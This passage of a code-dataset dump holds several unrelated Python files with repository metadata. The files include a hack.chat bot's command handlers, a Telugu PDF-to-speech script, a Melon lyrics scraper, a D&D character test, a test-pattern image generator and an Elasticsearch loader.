self._hackChat.send(\n \"@{} you have messages:\\n{}\".format(self._info[\"nick\"], reply))\n\n def _alias(self):\n \"\"\"Sends the requested trip code's holdees.\"\"\"\n if self._msg:\n doc = self._db[\"trip_codes\"].find_one({\n self._msg: {\n \"$exists\": True\n }\n })\n if doc:\n nicks = \", \".join(doc[self._msg])\n if len(nicks) > self._maxChars:\n data = paste.dpaste(\"\\n\".join(doc[self._msg]))\n if data[\"type\"] == \"success\":\n nicks = data[\"data\"]\n else:\n self._hackChat.send(\"Sorry, I couldn't get it.\")\n return\n self._hackChat.send(\n \"@{} {} has the \".format(self._info[\"nick\"], self._msg)\n + \"aliases {}\".format(nicks))\n else:\n self._hackChat.send(\n \"@{} no aliases were found\".format(self._info[\"nick\"]))\n else:\n self._hackChat.send(\n \"@{} tells the trip codes' aliases \".format(self._info[\"nick\"])\n + \"(e.g., {}alias dIhdzE)\".format(self._trigger))\n\n def _away(self):\n \"\"\"Handles AFK statuses.\"\"\"\n field = \"{}.{}\".format(self._hackChat.channel, self._info[\"nick\"])\n self._db[\"afk\"].update_one(\n {\n self._hackChat.channel: {\n \"$exists\": True\n }\n },\n {\n \"$set\": {\n field: self._msg\n }\n },\n True\n )\n reply = \"@{} is now AFK\".format(self._info[\"nick\"])\n if self._msg:\n reply += \": {}\".format(self._msg)\n self._hackChat.send(reply)\n\n def _check_uptime(self):\n \"\"\"Tells the bot's uptime.\"\"\"\n diff = time.time() - self._startTime\n oneSecond = 1\n oneMinute = oneSecond * 60\n oneHour = oneMinute * 60\n oneDay = oneHour * 24\n timeTypes = {\n \"days\": {\n \"length\": oneDay,\n \"count\": 0\n },\n \"hours\": {\n \"length\": oneHour,\n \"count\": 0\n },\n \"minutes\": {\n \"length\": oneMinute,\n \"count\": 0\n },\n \"seconds\": {\n \"length\": oneSecond,\n \"count\": 0\n }\n }\n times = []\n for timeType in timeTypes:\n length = timeTypes[timeType][\"length\"]\n count = timeTypes[timeType][\"count\"]\n while diff > length:\n count += 1\n diff -= length\n if count:\n # Check if time is singular (e.g., \"1 days\" to \"1 day\").\n name = timeType[:len(timeType) - 1] if count == 1 else timeType\n times.append(\"{} {}\".format(count, name))\n times = \", \".join(times)\n self._hackChat.send(\"@{} {}\".format(self._info[\"nick\"], times))\n\n def _convert(self):\n \"\"\"Handles currency conversion.\"\"\"\n converted = False\n data = self._cmd.split(\":\") if \":\" in self._cmd else None\n if data and len(data) == 3:\n fromCode = data[1].upper()\n toCode = data[2].upper()\n if fromCode and toCode:\n data = currency.convert(self._exchangeRateApiKey, fromCode,\n toCode)\n if data[\"type\"] == \"success\":\n converted = True\n self._hackChat.send(\n \"@{} 1 {} = \".format(self._info[\"nick\"], fromCode)\n + \"{} {}\".format(data[\"response\"], toCode))\n if not converted:\n self._hackChat.send(\n \"@{} Sorry, I couldn't convert \".format(self._info[\"nick\"])\n + \"that. (e.g., {}rate:usd:inr \".format(self._trigger)\n + \"gives 1 USD = 64 INR)\")\n\n def _define(self):\n \"\"\"Handles definitions.\"\"\"\n if self._msg:\n data = self._oxford.define(self._msg)\n if data[\"type\"] == \"success\":\n self._hackChat.send(\n \"@{} {}: \".format(self._info[\"nick\"], self._msg)\n + data[\"response\"])\n else:\n self._hackChat.send(\n \"@{} Sorry, I couldn't find \".format(self._info[\"nick\"])\n + \"any definitions for that.\")\n else:\n self._hackChat.send(\n \"@{} e.g., {}\".format(self._info[\"nick\"], self._trigger)\n + \"define hello\")\n\n def _generate_katex(self):\n \"\"\"Handles KaTeX.\"\"\"\n colors = [\"red\", \"orange\", \"green\", \"blue\", \"pink\", \"purple\", \"gray\",\n \"rainbow\"]\n sizes = [\"tiny\", \"scriptsize\", \"footnotesize\", \"small\", \"normalsize\",\n \"large\", \"Large\", \"LARGE\", \"huge\", \"Huge\"]\n fonts = [\"mathrm\", \"mathit\", \"mathbf\", \"mathsf\", \"mathtt\", \"mathbb\",\n \"mathcal\", \"mathfrak\", \"mathscr\"]\n if self._msg:\n disallowed = (\"#\", \"$\", \"%\", \"&\", \"_\", \"{\", \"}\", \"\\\\\", \"?\")\n if set(self._msg).isdisjoint(disallowed):\n data = self._cmd.split(\".\")\n stringify = lambda value: value if value else \"\"\n size = stringify(utility.identical_item(data, sizes))\n color = stringify(utility.identical_item(data, colors))\n font = stringify(utility.identical_item(data, fonts))\n txt = utility.remove_emoji(self._msg)\n txt = katex.generator(txt, size, color, font)\n self._hackChat.send(\n \"@{} says {}\".format(self._info[\"nick\"], txt))\n else:\n invalid = \"\\\"{}\\\"\".format(\"\\\", \\\"\".join(disallowed))\n self._hackChat.send(\n \"@{} KaTeX doesn't support \".format(self._info[\"nick\"])\n + invalid)\n else:\n reply = (\"@{} stylizes text (e.g., \".format(self._info[\"nick\"])\n + self._trigger\n + \"katex.rainbow.huge bye)\\n\")\n reply += \"OPTIONAL COLORS: {}\\n\".format(\", \".join(colors))\n reply += \"OPTIONAL SIZES: {}\\n\".format(\", \".join(sizes))\n reply += \"OPTIONAL FONTS: {}\\n\".format(\", \".join(fonts))\n self._hackChat.send(reply)\n\n def _give_poetry(self):\n \"\"\"Handles poetry.\"\"\"\n if self._msg:\n isPoet = True if self._cmd == \"poet\" else False\n data = poetry.poems(self._msg, isPoet)\n if data:\n rand = random.SystemRandom()\n data = data[rand.randrange(len(data))]\n header = \"{} by {}\".format(data[\"title\"], data[\"author\"])\n if len(header) > 100:\n header = \"{}...\".format(header[:97])\n pasted = paste.dpaste(data[\"poem\"], title=header)\n linked = \"Read the rest at {}\".format(pasted[\"data\"])\n reply = (\"@{} {}\\n\".format(self._info[\"nick\"], data[\"title\"])\n + \"By: {}\\n{}\".format(data[\"author\"], data[\"poem\"]))\n cut = utility.shorten_lines(reply, self._charsPerLine,\n self._maxLines - 1)\n self._hackChat.send(cut + linked)\n else:\n reply = \"@{} Sorry, I couldn't find any poems for that.\"\n self._hackChat.send(reply.format(self._info[\"nick\"]))\n else:\n if self._cmd == \"poem\":\n self._hackChat.send(\n \"@{} finds a poem by its name \".format(self._info[\"nick\"])\n + \"(e.g., {}poem sonnet)\".format(self._trigger))\n else:\n self._hackChat.send(\n \"@{} finds a poem from a poet \".format(self._info[\"nick\"])\n + \"(e.g., {}poet shakespeare)\".format(self._trigger))\n\n def _help(self):\n \"\"\"Sends a message on how to use the bot.\"\"\"\n joinWith = \" {}\".format(self._trigger)\n reply = joinWith.join(sorted(self._commands))\n reply = self._trigger + reply\n if self._codeUrl:\n reply += \"\\nsource code: {}\".format(self._codeUrl)\n self._hackChat.send(\"@{} {}\".format(self._info[\"nick\"], reply))\n\n def _join(self):\n \"\"\"Joins a channel.\"\"\"\n if self._msg:\n self._joinChannel(self._msg)\n else:\n self._hackChat.send(\n \"@{} joins a hack.chat channel \".format(self._info[\"nick\"])\n + \"(e.g., {}join ben)\\nYou can also \".format(self._trigger)\n + \"invite the bot via the sidebar.\")\n\n def _joke(self):\n \"\"\"Sends jokes.\"\"\"\n joke = jokes.yo_momma()\n self._hackChat.send(\"@{} {}\".format(self._info[\"nick\"], joke))\n\n def _leave(self):\n \"\"\"Leaves the channel currently connected to if allowed.\"\"\"\n if self._hackChat.channel in self._channels:\n self._hackChat.send(\"I cannot leave this channel.\")\n else:\n self._hackChat.leave()\n\n def _message(self):\n \"\"\"Saves messages to send to users when they're next active.\"\"\"\n info = self._cmd.split(\":\")\n if len(info) == 2 and info[1] and self._msg:\n self._db[\"messages\"].update_one(\n {\n self._hackChat.channel: {\n \"$exists\": True\n }\n },\n {\n \"$addToSet\": {\n \"{}.{}\".format(self._hackChat.channel, info[1]): {\n \"sender\": self._info[\"nick\"],\n \"message\": self._msg\n }\n }\n },\n True\n )\n self._hackChat.send(\n \"@{}, @{} will get your \".format(self._info[\"nick\"], info[1])\n + \"message the next time they message or join a channel.\")\n else:\n self._hackChat.send(\n \"@{} sends a message to a user the \".format(self._info[\"nick\"])\n + \"next time they send a message or join a channel (e.g., \"\n + \"{}msg:ben how are you?)\".format(self._trigger))\n\n def _request_statistics(self):\n \"\"\"Requests statistics.\"\"\"\n self._hackChat.stats()\n\n def _search(self):\n \"\"\"Handles searches.\"\"\"\n if self._msg:\n results = search.duckduckgo(self._msg, \"hack.chat bot\")\n reply = \"\"\n if results[\"URL\"]:\n reply += \"{} \".format(results[\"URL\"])\n if results[\"Heading\"]:\n reply += \"{}: \".format(results[\"Heading\"])\n if results[\"Answer\"]:\n reply += results[\"Answer\"]\n elif results[\"AbstractText\"]:\n reply += results[\"AbstractText\"]\n else:\n reply = \"\"\n tell = \"@{} \".format(self._info[\"nick\"])\n reply = utility.shorten(reply, self._maxChars - len(tell), \".\")\n if not reply:\n reply = \"Sorry, I couldn't find anything.\"\n self._hackChat.send(tell + reply)\n else:\n self._hackChat.send(\n \"@{} instant answers (e.g., \".format(self._info[\"nick\"])\n + \"{}search pokemon ruby)\".format(self._trigger))\n\n def _strengthen(self):\n \"\"\"Handles passwords.\"\"\"\n if self._msg:\n pwd = password.strengthen(self._msg)\n self._hackChat.send(\"@{} {}\".format(self._info[\"nick\"], pwd))\n else:\n self._hackChat.send(\n \"@{} strengthens a password (e.g., \".format(self._info[\"nick\"])\n + \"{}password gum)\".format(self._trigger))\n\n def _toss(self):\n \"\"\"Handles coin tosses.\"\"\"\n rand = random.SystemRandom()\n result = \"heads\" if rand.randrange(2) else \"tails\"\n self._hackChat.send(\"@{} {}\".format(self._info[\"nick\"], result))\n\n def _translate(self):\n \"\"\"Handles translations.\"\"\"\n languages = {\"english\": \"en\",\n \"spanish\": \"es\",\n \"pedi\": \"nso\",\n \"romanian\": \"ro\",\n \"malay\": \"ms\",\n \"zulu\": \"zu\",\n \"indonesian\": \"id\",\n \"tswana\": \"tn\"}\n explain = True\n if self._msg and len(re.findall(\":\", self._cmd)) == 2:\n data = self._cmd.lower().split(\":\")\n if data[1] in languages and data[2] in languages:\n explain = False\n srcLang = languages[data[1]]\n targetLang = languages[data[2]]\n words = self._msg.split()\n translations = []\n for word in words:\n word = re.sub(r\"[^a-zA-Z]\", \"\", word)\n word = self._oxford.translate(word, targetLang, srcLang)\n if word[\"type\"] == \"failure\":\n translations = []\n break\n translations.append(word[\"response\"])\n if translations:\n translated = \" \".join(translations)\n self._hackChat.send(\n \"@{} {}\".format(self._info[\"nick\"], translated))\n else:\n self._hackChat.send(\n \"@{} Sorry, I couldn't \".format(self._info[\"nick\"])\n + \"translate it all.\")\n if explain:\n self._hackChat.send(\n \"@{} supported languages: \".format(self._info[\"nick\"])\n + \"{}\\ne.g., \".format(\", \".join(languages.keys()))\n + \"{}\".format(self._trigger)\n + \"translate:english:spanish I have a holiday!\\n\")\n\n def _urban_define(self):\n \"\"\"Handles urban definitions.\"\"\"\n if self._msg:\n data = dictionary.urban(self._msg)\n if data:\n reply = \"@{} {}: {} \".format(self._info[\"nick\"], data[\"word\"],\n data[\"definition\"])\n reply = utility.shorten_lines(reply, self._charsPerLine,\n self._maxLines - 1)\n self._hackChat.send(reply + data[\"permalink\"])\n else:\n self._hackChat.send(\n \"@{} Sorry, I couldn't find \".format(self._info[\"nick\"])\n + \"any definitions for that.\")\n else:\n self._hackChat.send(\n \"@{} searches Urban Dictionary \".format(self._info[\"nick\"])\n + \"(e.g., {}urban covfefe)\".format(self._trigger))\n\n\nif __name__ == \"__main__\":\n HackChatBot()\n","repo_name":"neelkamath/hack.chat-bot","sub_path":"src/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":23406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"31877720562","text":"from utils import get_lib_dir, delimited_string, find_or_create\nfrom dotenv import load_dotenv, dotenv_values\nfrom tesseract_comp import extract_info\nfrom pdf2imageconverter import convert_pdf_to_image\nimport pytesseract\nfrom gtts import gTTS\nimport os\nfrom PIL import Image\n\n\n\nload_dotenv()\n\npdf_path = f'{os.getcwd()}{dotenv_values()[\"PDF_PATH\"]}'\n\ntesser_data = os.getcwd()+dotenv_values()['TESSER_TES_DATS']\n\nos.environ['TESSDATA_PREFIX'] = tesser_data\n\ntesser_path = dotenv_values()['TESSER_PATH_']+f\"{delimited_string}tesseract.exe\"\n\npytesseract.pytesseract.tesseract_cmd = f'''{os.getcwd()}{tesser_path}'''\n\naudio_dir = \"audios\" + delimited_string\nimage_dir = \"images\"+ delimited_string\nextracted_text = \"text\"+ delimited_string\n\nfor file in os.listdir(pdf_path):\n\n if file.split('.')[-1] == 'pdf':\n f_dir = f'{file.split(\".\")[0]}{delimited_string}'\n find_or_create([audio_dir+f_dir, image_dir+f_dir, extracted_text+f_dir])\n images = convert_pdf_to_image(pdf_path+f'{delimited_string}{file}', get_lib_dir(os.getcwd(),\n delimited_string, dotenv_values()['POPPLER_BIN'], 0))\n\n cnt = 0\n for image in images:\n cnt += 1\n image.save(image_dir+f_dir+f'{cnt}.jpg', \"JPEG\")\n print(\"extracting page: \", image)\n with open(extracted_text+f_dir+f'{cnt}.txt', 'w', encoding=\"utf-8\") as txt_file:\n txt_file.write(extract_info(image))\n myobj = gTTS(text=extract_info(image), lang=\"te\", slow=False)\n myobj.save(audio_dir+f_dir+f'{cnt}.mp3')\n\n","repo_name":"shankar369/Telugu-PDF-Reader","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"72332520869","text":"# This package will contain the spiders of your Scrapy project\n#\n# Please refer to the documentation for information on how to create and manage\n# your spiders.\n# This package will contain the spiders of your Scrapy project\n#\n# Please refer to the documentation for information on how to create and manage\n# your spiders.\n#https://www.youtube.com/results?search_query=%EC%9A%B4%EB%AA%85%EC%9D%B4+%EB%82%B4%EA%B2%8C+%EB%A7%90%ED%95%B4%EC%9A%94+%ED%97%A4%EC%9D%B4%EC%A6%88+%28Heize%29+%EA%B0%80\nimport scrapy\nimport pandas as pd\nimport json\nimport re\nfrom pytube import YouTube\nimport os\nimport pandas as pd\nclass QuotesSpider(scrapy.Spider):\n def __init__(self, name=None, **kwargs):\n super().__init__(name=name, **kwargs)\n custom_settings = {\n 'DOWNLOADER_MIDDLEWARES' : {\n 'scrapy.downloadermiddlewares.useragent.UserAgentMiddleware': None,\n 'scrapy.downloadermiddlewares.retry.RetryMiddleware': None,\n 'scrapy_fake_useragent.middleware.RandomUserAgentMiddleware': 400,\n 'scrapy_fake_useragent.middleware.RetryUserAgentMiddleware': 401,\n }\n }\n\n self.save_result_path = '/content/drive/MyDrive/data/svs/melone_result_re.tsv'\n self.input_list = '../data.tsv'\n\n if os.path.isfile(self.save_result_path):\n self.song_db = pd.read_csv(self.save_result_path,sep='\\t')\n else: \n self.song_db = pd.DataFrame(columns = ['titles' , 'artist', 'lyrics'])\n \n self.lyrics_series = list(self.song_db['lyrics'])\n self.title_series = list(self.song_db['titles'])\n self.artist_series = list(self.song_db['artist'])\n name = \"quotes\"\n\n def make_url(self):\n data = pd.read_csv(self.input_list,sep='\\t')\n data = data[['titles','artist']]\n if len(self.song_db) != 0:\n data = pd.concat([data,self.song_db[['titles','artist']]]).drop_duplicates(keep=False)\n print(data.head())\n print('????????????????')\n if len(data) == 0:\n print('finished')\n data['adding'] = data['titles'] + ' ' + data['artist']\n \n urls = []\n info = []\n for i,j,k in zip(data['adding'],data['titles'],data['artist']):\n urls.append('https://www.melon.com/search/total/index.htm?q='+i)\n #urls.append('https://www.melon.com')\n info.append([['title',j],['artist',k]])\n return urls,info\n\n def start_requests(self):\n urls, info = self.make_url()\n for url,meta in zip(urls,info):\n yield scrapy.Request(url=url, callback=self.parse,meta=meta)\n\n def parse(self, response):\n song_id = None\n\n titles = response.xpath('//*[@id=\"conts\"]/div[*]/div[1]/ul/li[*]/dl/dt/a[2]/text()').getall()\n for i,title in enumerate(titles):\n if title.replace(' ','') == response.meta['title'].replace(' ',''):\n song_id = response.xpath('//*[@id=\"conts\"]/div[*]/div/ul/li['+str(i+1)+']/dl/dt/a[1]/@data-song-no').get()\n break\n\n if song_id == None:\n song_list = response.xpath('//*[@id=\"frm_songList\"]/div/table/tbody/tr[*]/td[3]/div/div/a[2]/@title').getall()\n list_id = ['frm_songList'] * len(song_list)\n temp = response.xpath('//*[@id=\"frm_searchSong\"]/div/table/tbody/tr[*]/td[3]/div/div/a[2]/@title').getall()\n list_id = list_id + ['frm_searchSong'] * len(temp)\n song_list = song_list + temp\n\n for i,title in enumerate(song_list):\n if title.replace(' ','') == response.meta['title'].replace(' ',''):\n song_id = response.xpath('//*[@id=\"'+list_id[i]+'\"]/div/table/tbody/tr/td['+str(i+1)+']/div/input/@value').get()\n if song_id == None:\n song_id = response.xpath('//*[@id=\"'+list_id[i]+'\"]/div/table/tbody/tr['+str(i+1)+']/td[1]/div/input/@value').get()\n break\n else:\n break\n \n if song_id == None:\n for i,title in enumerate(song_list):\n if response.meta['title'].replace(' ','') in title.replace(' ',''):\n song_id = response.xpath('//*[@id=\"'+list_id[i]+'\"]/div/table/tbody/tr/td['+str(i+1)+']/div/input/@value').get() \n if song_id == None: \n song_id = response.xpath('//*[@id=\"'+list_id[i]+'\"]/div/table/tbody/tr['+str(i+1)+']/td[1]/div/input/@value').get()\n break\n else:\n break\n \n if song_id == None:\n print('failed:',response.meta)\n\n #print('song_id: '+str(song_id.get()))\n url = 'https://www.melon.com/song/detail.htm?songId='+str(song_id)\n yield scrapy.Request(url=url, callback=self.parse_lyrics,meta=response.meta)\n\n def parse_lyrics(self,response):\n data = response.xpath('//*[@id=\"d_video_summary\"]/text()').getall()\n if len(data) == 1:\n data = response.xpath('//*[@id=\"d_video_summary\"]/*/text()').getall()\n lyrics = re.sub('[(\\\\r\\\\n(\\\\t){1,})(\\\\r{1,})]','', '%'.join(data))\n lyrics = re.sub('%{1,}','%',lyrics)\n if len(data) == 1:\n lyrics = re.sub('(\\\\r\\\\n){1,}','%',lyrics) \n \n #raw_data = {'titles':response.meta['title'],'artist':response.meta['artist'],'lyrics':lyrics.replace(\"\\n\",\"\")}\n self.title_series.append(response.meta['title'])\n self.artist_series.append(response.meta['artist'])\n self.lyrics_series.append(lyrics)\n self.song_db = pd.DataFrame()\n self.song_db['titles'] = pd.Series(self.title_series)\n self.song_db['artist'] = pd.Series(self.artist_series)\n self.song_db['lyrics'] = pd.Series(self.lyrics_series)\n self.song_db.to_csv(self.save_result_path,sep='\\t',index=False)","repo_name":"Ldoun/DeepSinger","sub_path":"data_crawling/lyrics_down/lyrics_down/spiders/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5924,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"71"}
+{"seq_id":"69946269350","text":"from unittest import TestCase\nfrom battle.ki import KiCharacter\nfrom character import *\nfrom dice import d6\nimport dnd\nimport random\nimport math\n\ncore.unit_length = core.UNIT_LENGTH_METER\ncore.unit_weight = core.UNIT_WEIGHT_KILOGRAM\n\n\nclass CharacterTest(TestCase):\n\n def __roll_ability_score(self):\n results = list()\n for i in range(0, 3):\n results.append(d6.roll())\n results.sort(reverse=True)\n return sum(results[:3])\n\n def __random_race(self):\n races = [dnd.human, dnd.elf, dnd.gnome, dnd.half_elf, dnd.half_orc, dnd.halfling]\n return races[math.floor(random.random() * len(races))]\n\n def __random_class(self):\n classes = [\n dnd.barbarian, dnd.bard, dnd.druid, dnd.cleric, dnd.sorcerer,\n dnd.wizard, dnd.rogue, dnd.monk, dnd.paladin, dnd.fighter\n ]\n return classes[math.floor(random.random() * len(classes))]\n\n def __random_gender(self):\n genders = [GENDER_FEMALE, GENDER_MALE]\n return genders[math.floor(random.random() * len(genders))]\n\n def __random_skill(self):\n skills = Skill.available_skills()\n return skills[math.floor(random.random() * len(skills))]\n\n def __random_feat(self):\n feats = Feat.available_feats()\n return feats[math.floor(random.random() * len(feats))]\n\n def random_character(self):\n random_character = KiCharacter(\"Random Character\")\n random_character.set_race(self.__random_race())\n\n # apply base stats\n random_character._strength = self.__roll_ability_score()\n random_character._wisdom = self.__roll_ability_score()\n random_character._charisma = self.__roll_ability_score()\n random_character._intellect = self.__roll_ability_score()\n random_character._dexterity = self.__roll_ability_score()\n random_character._constitution = self.__roll_ability_score()\n\n # add xp to be able to add class levels\n random_character.add_experience(5000)\n\n # assign class levels\n random_class = self.__random_class()\n for i in range(0, 10):\n random_character.add_class_level(random_class)\n\n random_character._gender = self.__random_gender()\n random_character._age = random_character.starting_age(random_character._classes[0]._starting_age_type)\n random_character._height = random_character.roll_height()\n random_character._weight = random_character.roll_weight()\n\n for i in range(0, 1 + math.floor(random.random() * 2)):\n random_character.learn_skill(self.__random_skill())\n\n random_character.learn_feat(self.__random_feat())\n return random_character\n\n def test_character(self):\n for i in range(0, 10):\n char = self.random_character()\n print(char)\n\n \"\"\"\n print(\"str\\t\\t\", tenlon.strength())\n print(\"wis\\t\\t\", tenlon.wisdom())\n print(\"cha\\t\\t\", tenlon.charisma())\n print(\"int\\t\\t\", tenlon.intellect())\n print(\"dex\\t\\t\", tenlon.dexterity())\n print(\"con\\t\\t\", tenlon.constitution())\n print(\"age\\t\\t\", tenlon._age)\n print(\"hp\\t\\t\", tenlon.hit_points())\n print(\"age-type\", tenlon.relative_age())\n print(\"height\\t\", tenlon.height(), \"m\")\n print(\"weight\\t\", tenlon.weight(), \"kg\")\n print(\"skills\\t\", tenlon._skills)\n print(\"feats\\t\", tenlon.feats())\n print(tenlon._skills[0].name + \"\\t\", tenlon.use_skill(tenlon._skills[0].name))\n \"\"\"\n\n","repo_name":"Kilghaz/pyd20","sub_path":"test/test_character.py","file_name":"test_character.py","file_ext":"py","file_size_in_byte":3509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"15169724166","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n#\nimport argparse\nimport Image\nimport ImageDraw\n# Definition\nCANVAS_X = (2880)\nCANVAS_Y = (1440)\nSTART_X1 = (760)\nSTART_Y1 = (720)\nSTART_X2 = (2160)\nSTART_Y2 = (720)\nBOX_WIDTH = (50)\nBOX_SPACING = (10)\nINDEX_START = (1.0)\nNUM_BOXS = (4)\nOUTLINE_OFFSET = (10)\nLINE_WIDTH = (3)\nLINE_COLOR = \"white\"\nTEMPFILE = \"pattern.png\"\nOUTFILE = \"test_pattern.png\"\nPATTERN_NUM = (2)\n# args parser\n# ---------------------------------------------------------------------------\nparser = argparse.ArgumentParser()\nparser.add_argument('--verbose', '-v',\n default=0,\n action='store_true',\n help='verbose flag')\nparser.add_argument('--outfile', '-o',\n default=OUTFILE,\n help='Filename to process')\nparser.add_argument('--x1',\n default=START_X1,\n type=int,\n help=\"The X1 coordinate of start\")\nparser.add_argument('--y1',\n default=START_Y1,\n type=int,\n help=\"The Y1 coordinate of start\")\nparser.add_argument('--x2',\n default=START_X2,\n type=int,\n help=\"The X2 coordinate of start\")\nparser.add_argument('--y2',\n default=START_Y2,\n type=int,\n help=\"The Y2 coordinate of start\")\nparser.add_argument('--box_width', '-w',\n default=BOX_WIDTH,\n type=int,\n help=\"The width of Box\")\nparser.add_argument('--box_spacing', '-s',\n default=BOX_SPACING,\n type=int,\n help=\"The width between Boxs\")\nparser.add_argument('--canvas_x', '-c',\n default=CANVAS_X,\n type=int,\n help=\"The width of Canvas\")\nparser.add_argument('--canvas_y', '-d',\n default=CANVAS_Y,\n type=int,\n help=\"The hight of Canvas\")\nparser.add_argument('--num_boxs', '-n',\n default=NUM_BOXS,\n type=int,\n help=\"Number of Boxs of each row\")\nparser.add_argument('--pattern_rgb', '-p',\n default='w',\n choices=['r', 'g', 'b', 'w', 'R', 'G', 'B', 'W'],\n help=\"Number of Boxs of each row\")\nparser.add_argument('--outline_width', '-b',\n default=OUTLINE_OFFSET,\n type=int,\n help=\"The offset of outline\")\nparser.add_argument('--line_width', '-l',\n default=LINE_WIDTH,\n type=int,\n help=\"The offset of outline\")\nargs = parser.parse_args()\n# ---------------------------------------------------------------------------\n\n\ndef create_canvas(canvas_x, canvas_y):\n im = Image.new(\"RGB\", (canvas_x, canvas_y))\n return im\n\n\ndef draw_color_box(draw, num_boxs, box_width, box_spacing,\n pattern_rgb, line_width):\n start_x = box_spacing + line_width\n start_y = box_spacing + line_width\n index = INDEX_START\n unit_div = (255.0)/((num_boxs**2)-1)\n for y in range(start_y, start_y+(box_width+box_spacing)*num_boxs,\n (box_width+box_spacing)):\n for x in range(start_x, start_x+(box_width+box_spacing)*num_boxs,\n (box_width+box_spacing)):\n cor = (x, y, x+box_width, y+box_width)\n if args.verbose:\n print(\"(x,y,x2,y2)={}\".format(cor))\n if index == INDEX_START:\n color_fill = 0\n elif index == (num_boxs**2):\n color_fill = 255\n else:\n color_fill = int((index-1) * unit_div)\n if pattern_rgb == 'w' or pattern_rgb == 'W':\n final_color = (color_fill, color_fill, color_fill, 255)\n if pattern_rgb == 'r' or pattern_rgb == 'R':\n final_color = (color_fill, 0, 0, 255)\n if pattern_rgb == 'g' or pattern_rgb == 'G':\n final_color = (0, color_fill, 0, 255)\n if pattern_rgb == 'b' or pattern_rgb == 'B':\n final_color = (0, 0, color_fill, 255)\n draw.rectangle(cor, fill=final_color)\n if args.verbose:\n print(\"final_color={}\".format(final_color))\n index = index + 1\n\n\ndef draw_box_outline(im, color, line_width):\n width, height = im.size\n draw = ImageDraw.Draw(im)\n cor = (line_width, line_width, width-1-line_width,\n height-1-line_width) # (x1,y1, x2,y2)\n line = (cor[0], cor[1], cor[0], cor[3])\n draw.line(line, fill=color, width=line_width)\n line = (cor[0], cor[1], cor[2], cor[1])\n draw.line(line, fill=color, width=line_width)\n line = (cor[0], cor[3], cor[2], cor[3])\n draw.line(line, fill=color, width=line_width)\n line = (cor[2], cor[1], cor[2], cor[3])\n draw.line(line, fill=color, width=line_width)\n\n\ndef merge(a, b):\n images = map(Image.open, [a, b])\n widths, heights = zip(*(i.size for i in images))\n\n total_width = sum(widths)\n max_height = max(heights)\n\n new_im = Image.new('RGB', (total_width, max_height))\n\n x_offset = 0\n for im in images:\n new_im.paste(im, (x_offset, 0))\n x_offset += im.size[0]\n\n new_im.save('test.png')\n\n\ndef picture_canvas_prepare(nb, bw, sw, of, lw):\n y_w = x_w = nb * bw + (nb - 1) * sw + lw * 2 + 2 * of\n im = create_canvas(x_w, y_w)\n draw = ImageDraw.Draw(im)\n return im, draw\n\n\ndef pattern_paste(pattern_file, canvas, target, outputfile, num):\n img = Image.open(pattern_file, 'r')\n img_w, img_h = img.size\n background = Image.new('RGB', canvas)\n bg_w, bg_h = background.size\n if num == 1:\n target_x1, target_y1 = target\n background.paste(img, (target_x1-img_w/2, target_y1-img_h/2))\n elif num == 2:\n target_x1, target_y1, target_x2, target_y2 = target\n background.paste(img, (target_x1-img_w/2, target_y1-img_h/2))\n background.paste(img, (target_x2-img_w/2, target_y2-img_h/2))\n\n background.save(outputfile)\n\n\ndef main():\n num_boxs = args.num_boxs\n box_width = args.box_width\n box_spacing = args.box_spacing\n pattern_rgb = args.pattern_rgb\n outline_width = args.outline_width\n line_width = args.line_width\n im, draw = picture_canvas_prepare(num_boxs, box_width,\n box_spacing, outline_width, line_width)\n draw_color_box(draw, num_boxs, box_width, box_spacing, pattern_rgb,\n line_width)\n draw_box_outline(im, LINE_COLOR, line_width)\n im.save(TEMPFILE)\n pattern_paste(TEMPFILE, (args.canvas_x, args.canvas_y),\n (args.x1, args.y1, args.x2, args.y2),\n args.outfile, PATTERN_NUM)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"jimlin95/test_pattern","sub_path":"gen_test_pattern_v2.py","file_name":"gen_test_pattern_v2.py","file_ext":"py","file_size_in_byte":6881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"72601860699","text":"import pandas as pd\nfrom elasticsearch import Elasticsearch\n\n\nes = Elasticsearch('localhost:9200')\n\n\ndef create_index(mapping: dict, index_name: str) -> None:\n es.indices.create(index=index_name)\n es.indices.put_mapping(index=index_name, body=mapping)\n\n\ndef insert_data(file_path: str, index_name: str) -> None:\n df = pd.read_json(file_path).fillna(\"\")\n for _, row in df.iterrows():\n doc = row.to_dict()\n es.index(index=index_name, body=doc) \n\n\nif __name__ == \"__main__\":\n\n index_name = \"song_txt_corpus\"\n file_path = \"../data/corpus.json\"\n\n mapping = {\n \"properties\": {\n \"artist\": {\"type\": \"text\"},\n \"song_name\": {\"type\": \"text\"},\n \"song_txt\": {\"type\": \"text\"},\n \"song_href\": {\"type\": \"text\"},\n \"song_id\": {\"type\": \"integer\"},\n \"top_similar\": {\"type\": \"integer\"},\n }\n }\n\n create_index(mapping=mapping, index_name=index_name)\n insert_data(file_path=file_path, index_name=index_name)","repo_name":"BlackRaveOn/russian_songs_corpus","sub_path":"es_utils/create_corpus.py","file_name":"create_corpus.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
